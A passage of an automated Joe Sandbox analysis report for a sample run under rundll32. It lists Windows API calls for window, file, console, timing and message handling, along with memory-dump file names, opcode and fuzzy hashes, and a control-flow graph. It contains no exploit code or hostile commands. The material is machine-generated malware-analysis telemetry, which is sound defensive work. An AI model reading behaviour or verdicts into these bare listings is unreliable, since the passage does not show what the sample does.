                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 04F2A9FC
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 04F2AA0D
                              • ShowWindow.USER32(?,00000006,00000000,?,?,?,04F37CEF,?,04FA01D8), ref: 04F2AA2D
                              • ShowWindow.USER32(?,00000005,00000000,?,?,?,04F37CEF,?,04FA01D8), ref: 04F2AA37
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Window$LongShow$IconicVisible
                              • String ID:
                              • API String ID: 3484284227-0
                              • Opcode ID: 243891d753c0975f997e18be28a9f90e1d9aaccac462d16797a3c9dadb621813
                              • Instruction ID: 0e391872174356d8ebdb68ac8394d7496e4dd4e1ff7377cf1dc637719918dfe9
                              • Opcode Fuzzy Hash: 243891d753c0975f997e18be28a9f90e1d9aaccac462d16797a3c9dadb621813
                              • Instruction Fuzzy Hash: 5B11EB02E4D6F078E72276250E01FAF2DD48FD3319F184965FCD4920D2DA19E1479637
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 289 4d47948-4d47962 290 4d47964-4d47967 289->290 291 4d47973-4d47984 289->291 292 4d47986-4d47997 290->292 293 4d47969-4d4796c 290->293 294 4d479aa-4d479b6 291->294 292->294 297 4d4796e 293->297 298 4d47999-4d479a3 293->298 295 4d47a60-4d47a80 CreateFileW 294->295 296 4d479bc-4d479c0 294->296 302 4d47a94-4d47a9c 295->302 303 4d47a82-4d47a8f GetLastError 295->303 299 4d479d2-4d479df 296->299 300 4d479c2-4d479cb 296->300 301 4d47bab-4d47bb1 297->301 298->294 306 4d479e1-4d479e7 299->306 307 4d479ff-4d47a06 GetStdHandle 299->307 300->299 304 4d47b64-4d47b6c 302->304 305 4d47aa2-4d47ab7 GetFileSize 302->305 303->301 312 4d47b7c-4d47b82 304->312 313 4d47b6e-4d47b75 304->313 308 4d47ac7-4d47acf 305->308 309 4d47ab9-4d47ac2 call 4d47930 305->309 310 4d479f0 306->310 311 4d479e9-4d479ee 306->311 314 4d47a08-4d47a10 307->314 317 4d47ad1 308->317 318 4d47ad3-4d47ae1 SetFilePointer 308->318 309->301 316 4d479f5-4d479fd GetStdHandle 310->316 311->316 312->301 320 4d47b84-4d47b8f GetFileType 312->320 313->312 314->312 319 4d47a16-4d47a21 GetFileType 314->319 316->314 317->318 322 4d47b02-4d47b0b call 4d47930 318->322 323 4d47ae3-4d47b00 ReadFile 318->323 324 4d47a23-4d47a29 319->324 325 4d47a4d-4d47a5b 319->325 326 4d47b96-4d47ba2 call 4d47930 320->326 327 4d47b91-4d47b92 320->327 322->301 323->322 328 4d47b10-4d47b14 323->328 330 4d47a3c-4d47a48 GetConsoleCP 324->330 331 4d47a2b-4d47a37 GetConsoleOutputCP 324->331 325->312 326->301 332 4d47ba4 327->332 333 4d47b94 327->333 328->304 336 4d47b16-4d47b1a 328->336 330->312 331->312 332->301 333->301 336->304 338 4d47b1c-4d47b22 336->338 338->304 339 4d47b24-4d47b27 338->339 340 4d47b2d-4d47b30 339->340 341 4d47b32-4d47b46 SetFilePointer 340->341 342 4d47b5f-4d47b62 340->342 343 4d47b54-4d47b5d call 4d47930 341->343 344 4d47b48-4d47b52 SetEndOfFile 341->344 342->304 342->340 343->301 344->304 344->343
                              APIs
                              • GetStdHandle.KERNEL32(FFFFFFF5), ref: 04D479F6
                              • GetStdHandle.KERNEL32(000000F6), ref: 04D47A01
                              • GetFileType.KERNEL32(00000000), ref: 04D47A19
                              • GetConsoleOutputCP.KERNEL32(00000000), ref: 04D47A2B
                              • GetConsoleCP.KERNEL32(00000000), ref: 04D47A3C
                              • GetFileType.KERNEL32(00000000), ref: 04D47B87
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: ConsoleFileHandleType$Output
                              • String ID:
                              • API String ID: 393880136-0
                              • Opcode ID: 782196c2a1cce17ec620a3e880dab5ce57b00133265db9d4721055c7011beb36
                              • Instruction ID: e2352c55640ab64f49591507f56172d020d17b3487077a0a8510e9b6cf963aa4
                              • Opcode Fuzzy Hash: 782196c2a1cce17ec620a3e880dab5ce57b00133265db9d4721055c7011beb36
                              • Instruction Fuzzy Hash: EC51A074B00200ABFF20EF6888C476636A4FFC5354F148AA9E9598F2C5E774F94587A6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 04D496B9
                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 04D496BF
                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04D496D2
                              • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04D496DB
                              • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,04D49752,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04D49706
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                              • API String ID: 1184211438-79381301
                              • Opcode ID: f631773bcf158eaafb4df48c9d8983f374ab875cee6eecb898bf5bcb589a17c9
                              • Instruction ID: 2a3350a27a0b742922ae561c5b29de02b7d484e4fee2b2010ea27658383cc92d
                              • Opcode Fuzzy Hash: f631773bcf158eaafb4df48c9d8983f374ab875cee6eecb898bf5bcb589a17c9
                              • Instruction Fuzzy Hash: DA1172B0E00208AFEB10DFB6D86469EB7F8EBC0324F5480E5D51497641D778BA44CB21
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04D51ABC
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: ExceptionRaise
                              • String ID:
                              • API String ID: 3997070919-0
                              • Opcode ID: 892c8cec453a7efa81957db0ee583abeb232268cac6d0ad50fdc89c2273392cc
                              • Instruction ID: 08ad8a576ef003c7d6c2228519f3e4fc31cace9006f2f89f83d1f935247cd9ad
                              • Opcode Fuzzy Hash: 892c8cec453a7efa81957db0ee583abeb232268cac6d0ad50fdc89c2273392cc
                              • Instruction Fuzzy Hash: 69A12975E002099FEF14DFA8D880BEEB7B5FB48314F254129E915A7290EF74AD85CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 04D76E69
                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 04D76E85
                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 04D76EBE
                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 04D76F3B
                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 04D76F54
                              • VariantCopy.OLEAUT32(?), ref: 04D76F89
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                              • String ID:
                              • API String ID: 351091851-3916222277
                              • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction ID: b408d88207e6a3f79ffe190608c69ef4965589ec56e16103361c0fb62b5294bd
                              • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction Fuzzy Hash: CE51C875A00A299BDB26DB59CC80AD9B7BCFF48214F0442D5E509A7215FA30EF858F61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000,?), ref: 04D45DCA
                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 04D45DE4
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: a271d3630d677d3883e92bb5f898ceccc1d51f070ca2a1dbea6ea6c9f8419d47
                              • Instruction ID: b11aae2c5804e7cc75b5dc96b7d7916eb95246ea10f19ce6f0155df29d7a2dbe
                              • Opcode Fuzzy Hash: a271d3630d677d3883e92bb5f898ceccc1d51f070ca2a1dbea6ea6c9f8419d47
                              • Instruction Fuzzy Hash: 6B712731700340AFE715CF29E99871ABBD4EFC5724F1882AAD6848B391DB74EC41C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCapture.USER32 ref: 04F37752
                              • IsWindowUnicode.USER32(00000000), ref: 04F37795
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04F377B0
                              • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 04F377CF
                              • GetWindowThreadProcessId.USER32(00000000), ref: 04F377DE
                              • GetWindowThreadProcessId.USER32(?,?), ref: 04F377EF
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04F3780F
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                              • String ID:
                              • API String ID: 1994056952-0
                              • Opcode ID: 54e30cd852c92e218a8b2dfed5b943e50f3f30d5468374f8b1022b907a1f5199
                              • Instruction ID: 57836b9e7f25b6ef7fff4d02dcdd2a32db4ef998131a641979009cd894024ec9
                              • Opcode Fuzzy Hash: 54e30cd852c92e218a8b2dfed5b943e50f3f30d5468374f8b1022b907a1f5199
                              • Instruction Fuzzy Hash: 542104B1604209AFEBA0FA59C980FAB73DCDF05215B24C828EDADC3251EA11F802C775
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cb91fca0369a63da0a82f58e2c74bd6834e3029f797e633e055bcaa1175e8504
                              • Instruction ID: 061f553b85477935818fb18aceb40170fa2874b34d5aae8249efd2310f631d4c
                              • Opcode Fuzzy Hash: cb91fca0369a63da0a82f58e2c74bd6834e3029f797e633e055bcaa1175e8504
                              • Instruction Fuzzy Hash: 84C13972B102405BE715DEBCEC9876DB3C6EBC6325F18863AE345CB385DA68EC458361
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 04D49DB8: GetCurrentThreadId.KERNEL32 ref: 04D49DBB
                              • GetTickCount.KERNEL32 ref: 04D49963
                              • GetTickCount.KERNEL32 ref: 04D4997B
                              • GetCurrentThreadId.KERNEL32 ref: 04D499AA
                              • GetTickCount.KERNEL32 ref: 04D499D5
                              • GetTickCount.KERNEL32 ref: 04D49A0C
                              • GetTickCount.KERNEL32 ref: 04D49A36
                              • GetCurrentThreadId.KERNEL32 ref: 04D49AA6
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: CountTick$CurrentThread
                              • String ID:
                              • API String ID: 3968769311-0
                              • Opcode ID: e3bb88305f2012e16ffcc2bbec27a585037748294954aed98173c6a9a0b76a8d
                              • Instruction ID: 2cb2ecc1c6b9c056a227547b35051d67a47646b8a9f5bc5d9bf569291898adee
                              • Opcode Fuzzy Hash: e3bb88305f2012e16ffcc2bbec27a585037748294954aed98173c6a9a0b76a8d
                              • Instruction Fuzzy Hash: FE416EB12083819FE721EE7AC49431FBBD1BBC1354F149AADD5D887285EA74E4808752
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04F379A4
                              • IsWindowUnicode.USER32 ref: 04F379B8
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04F379DB
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04F379F1
                              • TranslateMessage.USER32 ref: 04F37A76
                              • DispatchMessageW.USER32 ref: 04F37A83
                              • DispatchMessageA.USER32 ref: 04F37A8B
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                              • String ID:
                              • API String ID: 2190272339-0
                              • Opcode ID: c99aee6d61b1ffcf7939c47e50c4986ffeed5a1c9e5bd5e5c0ebcf8f6d84fd8e
                              • Instruction ID: 41650fb6be7cf74b1a16cad42dcd10bbd9b6a722627be9c29063185d974c3785
                              • Opcode Fuzzy Hash: c99aee6d61b1ffcf7939c47e50c4986ffeed5a1c9e5bd5e5c0ebcf8f6d84fd8e
                              • Instruction Fuzzy Hash: D22104E5B08346B6FF317A690C00B7EA7D58FC370BF14C85AE885D71A1DA96B5138223
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,04F908A8,00000000,?,04D4AA6A,?,?,04F9CB9C,04F9CB9C,?,?,04F91C38,04D51A03,04F908A8), ref: 04D4A9E5
                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,04F908A8,00000000,?,04D4AA6A,?,?,04F9CB9C,04F9CB9C,?,?,04F91C38,04D51A03), ref: 04D4A9EB
                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,04F908A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04F908A8,00000000,?,04D4AA6A,?,?,04F9CB9C), ref: 04D4AA06
                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,04F908A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04F908A8,00000000,?,04D4AA6A,?,?), ref: 04D4AA0C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
